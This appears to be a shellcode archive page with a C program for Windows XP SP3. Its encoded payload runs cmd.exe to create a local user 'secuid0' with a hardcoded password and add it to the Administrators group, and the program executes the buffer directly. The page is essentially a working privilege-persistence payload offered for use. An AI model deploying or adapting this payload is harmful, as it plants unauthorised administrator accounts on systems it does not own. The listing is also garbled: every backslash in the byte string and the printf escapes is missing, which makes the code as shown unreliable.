win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes
# Published : 2010-10-04
# Author :
# Previous Title : BSD x86 portbind + fork shellcode (111 bytes)
# Next Title : BSD x86 connect back Shellcode (81 bytes)

/*
Title: win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes
Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com
Method: Hardcoded opcodes (kernel32.winexec@7c8623ad, kernel32.exitprocess@7c81cafa)
Tested on: WinXP Pro SP3 (EN) 32bit - Build 2600.080413-2111
Greetz: offsec and inj3ct0r teams
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

char code[] = 	"xebx16x5bx31xc0x50x53xbbxadx23"
				"x86x7cxffxd3x31xc0x50xbbxfaxca"
				"x81x7cxffxd3xe8xe5xffxffxffx63"
				"x6dx64x2ex65x78x65x20x2fx63x20"
				"x6ex65x74x20x75x73x65x72x20x73"
				"x65x63x75x69x64x30x20x6dx30x6e"
				"x6bx20x2fx61x64x64x20x26x26x20"
				"x6ex65x74x20x6cx6fx63x61x6cx67"
				"x72x6fx75x70x20x61x64x6dx69x6e"
				"x69x73x74x72x61x74x6fx72x73x20"
				"x73x65x63x75x69x64x30x20x2fx61"
				"x64x64x00";

int main(int argc, char **argv)
{
	((void (*)())code)();
	printf("New local admin tUsername: secuid0ntttPassword: m0nk");
	return 0;
}